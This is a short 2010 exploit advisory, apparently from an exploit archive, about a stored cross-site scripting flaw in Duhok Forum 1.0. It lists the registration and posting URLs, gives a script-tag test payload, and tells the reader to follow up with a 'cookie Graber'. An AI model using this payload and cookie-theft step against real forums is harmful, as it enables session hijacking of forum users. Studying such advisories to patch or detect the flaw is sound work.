Duhok Forum 1.0 script Cross Site Scripting Vulnerability

Posted on 15 March 2010

=========================================================
Duhok Forum 1.0 script Cross Site Scripting Vulnerability
=========================================================

========================================================================================
| # Title    : Duhok Forum 1.0 script Cross Site Scripting Vulnerability
| # Author   : indoushka
| # Tested on: windows SP2 Fran&#65533;ais V.(Pnx2 2.0) + Lunix Fran&#65533;ais v.(9.4 Ubuntu)
| # Bug      : XSS
======================      Exploit By indoushka       =================================
 # Exploit  :
 
 1 - http://127.0.0.1/st/index.php?mode=register&Approval=1 (1 register in to the web site)
 
 2 - http://127.0.0.1/st/index.php?mode=editor&method=topic&f=1&c=1 (2 past a new post )
 
Put this code 4 virified is infected or not <ScRiPt>alert(213771818860)</ScRiPt> a test post
 
 3- if it infected post a new post and use cookie Graber


# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

Last 20

Exploits :

Last 20